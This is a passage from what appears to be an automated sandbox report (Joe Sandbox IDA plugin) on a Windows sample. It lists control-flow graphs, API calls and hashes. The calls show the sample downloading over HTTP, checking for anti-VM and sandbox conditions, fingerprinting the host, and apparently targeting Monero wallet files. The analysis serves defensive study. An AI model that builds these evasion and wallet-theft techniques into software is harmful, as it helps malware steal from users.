                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: a652647a8bedb82f41bac645b2c761131ee75924534df3b1c821a18e66c5980e
                              • Instruction ID: 03d1c4cbc61866fd1660ee10c33f4ebe8bab3b610cd9e7bcac72d46d29f393c5
                              • Opcode Fuzzy Hash: a652647a8bedb82f41bac645b2c761131ee75924534df3b1c821a18e66c5980e
                              • Instruction Fuzzy Hash: 52621AB5504208AFD348DFA8ED8995E37F9F7CC201716851AA61DC3264D63A98C2FF63

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 d36280-d3630b call d4a7a0 call d347b0 call d4a740 InternetOpenA StrCmpCA 1040 d36314-d36318 1033->1040 1041 d3630d 1033->1041 1042 d36509-d36525 call d4a7a0 call d4a800 * 2 1040->1042 1043 d3631e-d36342 InternetConnectA 1040->1043 1041->1040 1061 d36528-d3652d 1042->1061 1044 d36348-d3634c 1043->1044 1045 d364ff-d36503 InternetCloseHandle 1043->1045 1047 d3635a 1044->1047 1048 d3634e-d36358 1044->1048 1045->1042 1050 d36364-d36392 HttpOpenRequestA 1047->1050 1048->1050 1052 d364f5-d364f9 InternetCloseHandle 1050->1052 1053 d36398-d3639c 1050->1053 1052->1045 1055 d363c5-d36405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 d3639e-d363bf InternetSetOptionA 1053->1056 1059 d36407-d36427 call d4a740 call d4a800 * 2 1055->1059 1060 d3642c-d3644b call d48940 1055->1060 1056->1055 1059->1061 1066 d364c9-d364e9 call d4a740 call d4a800 * 2 1060->1066 1067 d3644d-d36454 1060->1067 1066->1061 1070 d364c7-d364ef InternetCloseHandle 1067->1070 1071 d36456-d36480 InternetReadFile 1067->1071 1070->1052 1075 d36482-d36489 1071->1075 1076 d3648b 1071->1076 1075->1076 1080 d3648d-d364c5 call d4a9b0 call d4a8a0 call d4a800 1075->1080 1076->1070 1080->1071
                              APIs
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                                • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • InternetOpenA.WININET(00D50DFE,00000001,00000000,00000000,00000000), ref: 00D362E1
                              • StrCmpCA.SHLWAPI(?,008DE4E0), ref: 00D36303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36335
                              • HttpOpenRequestA.WININET(00000000,GET,?,008DDA88,00000000,00000000,00400100,00000000), ref: 00D36385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D363BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D363D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00D363FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D3646D
                              • InternetCloseHandle.WININET(00000000), ref: 00D364EF
                              • InternetCloseHandle.WININET(00000000), ref: 00D364F9
                              • InternetCloseHandle.WININET(00000000), ref: 00D36503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 8f70f7f9604c9066d9410de66ceeb9a3591f963a343a8105d56a04ce6885404a
                              • Instruction ID: 2577da46c9b6528a0d03d9ddbe5fa3db44c0c9ebfe01b7f52115247d2d186c0d
                              • Opcode Fuzzy Hash: 8f70f7f9604c9066d9410de66ceeb9a3591f963a343a8105d56a04ce6885404a
                              • Instruction Fuzzy Hash: F8715F71A40218ABEB24DFA4CC49BEE7778FF44701F108198F5096B190DBB4AA85CF62

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 d45510-d45577 call d45ad0 call d4a820 * 3 call d4a740 * 4 1106 d4557c-d45583 1090->1106 1107 d45585-d455b6 call d4a820 call d4a7a0 call d31590 call d451f0 1106->1107 1108 d455d7-d4564c call d4a740 * 2 call d31590 call d452c0 call d4a8a0 call d4a800 call d4aad0 StrCmpCA 1106->1108 1124 d455bb-d455d2 call d4a8a0 call d4a800 1107->1124 1134 d45693-d456a9 call d4aad0 StrCmpCA 1108->1134 1137 d4564e-d4568e call d4a7a0 call d31590 call d451f0 call d4a8a0 call d4a800 1108->1137 1124->1134 1140 d457dc-d45844 call d4a8a0 call d4a820 * 2 call d31670 call d4a800 * 4 call d46560 call d31550 1134->1140 1141 d456af-d456b6 1134->1141 1137->1134 1272 d45ac3-d45ac6 1140->1272 1142 d456bc-d456c3 1141->1142 1143 d457da-d4585f call d4aad0 StrCmpCA 1141->1143 1146 d456c5-d45719 call d4a820 call d4a7a0 call d31590 call d451f0 call d4a8a0 call d4a800 1142->1146 1147 d4571e-d45793 call d4a740 * 2 call d31590 call d452c0 call d4a8a0 call d4a800 call d4aad0 StrCmpCA 1142->1147 1161 d45865-d4586c 1143->1161 1162 d45991-d459f9 call d4a8a0 call d4a820 * 2 call d31670 call d4a800 * 4 call d46560 call d31550 1143->1162 1146->1143 1147->1143 1250 d45795-d457d5 call d4a7a0 call d31590 call d451f0 call d4a8a0 call d4a800 1147->1250 1167 d45872-d45879 1161->1167 1168 d4598f-d45a14 call d4aad0 StrCmpCA 1161->1168 1162->1272 1174 d458d3-d45948 call d4a740 * 2 call d31590 call d452c0 call d4a8a0 call d4a800 call d4aad0 StrCmpCA 1167->1174 1175 d4587b-d458ce call d4a820 call d4a7a0 call d31590 call d451f0 call d4a8a0 call d4a800 1167->1175 1197 d45a16-d45a21 Sleep 1168->1197 1198 d45a28-d45a91 call d4a8a0 call d4a820 * 2 call d31670 call d4a800 * 4 call d46560 call d31550 1168->1198 1174->1168 1276 d4594a-d4598a call d4a7a0 call d31590 call d451f0 call d4a8a0 call d4a800 1174->1276 1175->1168 1197->1106 1198->1272 1250->1143 1276->1168
                              APIs
                                • Part of subcall function 00D4A820: lstrlen.KERNEL32(00D34F05,?,?,00D34F05,00D50DDE), ref: 00D4A82B
                                • Part of subcall function 00D4A820: lstrcpy.KERNEL32(00D50DDE,00000000), ref: 00D4A885
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D456A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45857
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45228
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45318
                                • Part of subcall function 00D452C0: lstrlen.KERNEL32(00000000), ref: 00D4532F
                                • Part of subcall function 00D452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00D45364
                                • Part of subcall function 00D452C0: lstrlen.KERNEL32(00000000), ref: 00D45383
                                • Part of subcall function 00D452C0: lstrlen.KERNEL32(00000000), ref: 00D453AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D4578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00D45A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 60628e0114aa94fff99429ac77e60d89df69b7b06214d7b097c1eea3cad2c412
                              • Instruction ID: fab478a7b59183dd729af1a3969306e06b8f6b67735528ee0e4710c51d29941d
                              • Opcode Fuzzy Hash: 60628e0114aa94fff99429ac77e60d89df69b7b06214d7b097c1eea3cad2c412
                              • Instruction Fuzzy Hash: B2E11E769501089BDB14FBB4EC97AED7338EF94300F508528B50666196EF34AA4DCBB3

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 d417a0-d417cd call d4aad0 StrCmpCA 1304 d417d7-d417f1 call d4aad0 1301->1304 1305 d417cf-d417d1 ExitProcess 1301->1305 1309 d417f4-d417f8 1304->1309 1310 d419c2-d419cd call d4a800 1309->1310 1311 d417fe-d41811 1309->1311 1313 d41817-d4181a 1311->1313 1314 d4199e-d419bd 1311->1314 1316 d41835-d41844 call d4a820 1313->1316 1317 d41970-d41981 StrCmpCA 1313->1317 1318 d418f1-d41902 StrCmpCA 1313->1318 1319 d41951-d41962 StrCmpCA 1313->1319 1320 d41932-d41943 StrCmpCA 1313->1320 1321 d41913-d41924 StrCmpCA 1313->1321 1322 d4185d-d4186e StrCmpCA 1313->1322 1323 d4187f-d41890 StrCmpCA 1313->1323 1324 d41821-d41830 call d4a820 1313->1324 1325 d418ad-d418be StrCmpCA 1313->1325 1326 d418cf-d418e0 StrCmpCA 1313->1326 1327 d4198f-d41999 call d4a820 1313->1327 1328 d41849-d41858 call d4a820 1313->1328 1314->1309 1316->1314 1336 d41983-d41986 1317->1336 1337 d4198d 1317->1337 1350 d41904-d41907 1318->1350 1351 d4190e 1318->1351 1333 d41964-d41967 1319->1333 1334 d4196e 1319->1334 1331 d41945-d41948 1320->1331 1332 d4194f 1320->1332 1329 d41926-d41929 1321->1329 1330 d41930 1321->1330 1342 d41870-d41873 1322->1342 1343 d4187a 1322->1343 1344 d41892-d4189c 1323->1344 1345 d4189e-d418a1 1323->1345 1324->1314 1346 d418c0-d418c3 1325->1346 1347 d418ca 1325->1347 1348 d418e2-d418e5 1326->1348 1349 d418ec 1326->1349 1327->1314 1328->1314 1329->1330 1330->1314 1331->1332 1332->1314 1333->1334 1334->1314 1336->1337 1337->1314 1342->1343 1343->1314 1355 d418a8 1344->1355 1345->1355 1346->1347 1347->1314 1348->1349 1349->1314 1350->1351 1351->1314 1355->1314
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00D417C5
                              • ExitProcess.KERNEL32 ref: 00D417D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 6ef2d39a50a4ea13370b0747a44ab8dfbad2b4012f5025b06d9d0a0caba32153
                              • Instruction ID: 872378a359984a43164757fa34284cbb92d55a02e698ecca10f68059506940ca
                              • Opcode Fuzzy Hash: 6ef2d39a50a4ea13370b0747a44ab8dfbad2b4012f5025b06d9d0a0caba32153
                              • Instruction Fuzzy Hash: 685143B9A1420AEFDB04DFA4D954BBE7BB5BB44305F108049E81AAB240D770E985DF72

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 d47500-d4754a GetWindowsDirectoryA 1357 d47553-d475c7 GetVolumeInformationA call d48d00 * 3 1356->1357 1358 d4754c 1356->1358 1365 d475d8-d475df 1357->1365 1358->1357 1366 d475e1-d475fa call d48d00 1365->1366 1367 d475fc-d47617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1368 d47628-d47658 wsprintfA call d4a740 1367->1368 1369 d47619-d47626 call d4a740 1367->1369 1377 d4767e-d4768e 1368->1377 1369->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00D47542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D4757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D4760A
                              • wsprintfA.USER32 ref: 00D47640
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 431532822bc1db18e4264fe4e2c3d7d50ac6733e5ece21c070799c20d7221744
                              • Instruction ID: 5e7afc32cd026c07d18de93a34a216481f68d57a9a25cda5a408f8625ea13496
                              • Opcode Fuzzy Hash: 431532822bc1db18e4264fe4e2c3d7d50ac6733e5ece21c070799c20d7221744
                              • Instruction Fuzzy Hash: 744181B1D04248ABDF10DF94DC45BEEBBB8EF48704F144199F50967280D774AA84CBB6

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D0570), ref: 00D498A1
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D0798), ref: 00D498BA
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D0600), ref: 00D498D2
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D0810), ref: 00D498EA
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D07B0), ref: 00D49903
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D8880), ref: 00D4991B
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008C6820), ref: 00D49933
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008C6840), ref: 00D4994C
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D07F8), ref: 00D49964
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D0828), ref: 00D4997C
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D05B8), ref: 00D49995
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D05D0), ref: 00D499AD
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008C69A0), ref: 00D499C5
                                • Part of subcall function 00D49860: GetProcAddress.KERNEL32(75900000,008D05E8), ref: 00D499DE
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D311D0: ExitProcess.KERNEL32 ref: 00D31211
                                • Part of subcall function 00D31160: GetSystemInfo.KERNEL32(?), ref: 00D3116A
                                • Part of subcall function 00D31160: ExitProcess.KERNEL32 ref: 00D3117E
                                • Part of subcall function 00D31110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D3112B
                                • Part of subcall function 00D31110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00D31132
                                • Part of subcall function 00D31110: ExitProcess.KERNEL32 ref: 00D31143
                                • Part of subcall function 00D31220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D3123E
                                • Part of subcall function 00D31220: __aulldiv.LIBCMT ref: 00D31258
                                • Part of subcall function 00D31220: __aulldiv.LIBCMT ref: 00D31266
                                • Part of subcall function 00D31220: ExitProcess.KERNEL32 ref: 00D31294
                                • Part of subcall function 00D46770: GetUserDefaultLangID.KERNEL32 ref: 00D46774
                                • Part of subcall function 00D31190: ExitProcess.KERNEL32 ref: 00D311C6
                                • Part of subcall function 00D47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47880
                                • Part of subcall function 00D47850: RtlAllocateHeap.NTDLL(00000000), ref: 00D47887
                                • Part of subcall function 00D47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D4789F
                                • Part of subcall function 00D478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47910
                                • Part of subcall function 00D478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D47917
                                • Part of subcall function 00D478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00D4792F
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008D8950,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D46AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00D46AF9
                              • Sleep.KERNEL32(00001770), ref: 00D46B04
                              • CloseHandle.KERNEL32(?,00000000,?,008D8950,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46B1A
                              • ExitProcess.KERNEL32 ref: 00D46B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 741ff3814728a27feb226640984db7457a8b92567368ce9090b07525f494bea9
                              • Instruction ID: daf7506ad8c9c499867baae75680c784f06872c1690c24ecbf5fc35296239abb
                              • Opcode Fuzzy Hash: 741ff3814728a27feb226640984db7457a8b92567368ce9090b07525f494bea9
                              • Instruction Fuzzy Hash: B6312870940209ABEB04FBF4DC56BEE7778EF44341F414518F602A2182DF70A945CAB3

                              Control-flow Graph

                              • Basic blocks: d31220-d31247 (call d489b0, GlobalMemoryStatusEx); d31249-d31271 (call d4da00 x2); d31273-d3127a; d31281-d31285; d31287; d31289-d31290; d31292-d31294 (ExitProcess); d3129a-d3129d
                              • Edges: d31220 -> d31273, d31249; d31273 -> d31281; d31249 -> d31281; d31281 -> d31287, d3129a; d31287 -> d31292, d31289; d31289 -> d3129a, d31292
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D3123E
                              • __aulldiv.LIBCMT ref: 00D31258
                              • __aulldiv.LIBCMT ref: 00D31266
                              • ExitProcess.KERNEL32 ref: 00D31294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 62a4dab229024cfaf238bf2833ce69ffba03aa6233bfda1984ec2262e0d8b4b0
                              • Instruction ID: fd73c530da668f46597e26511e9cfa144752eb07a4bfa1de234f005ff74c8c19
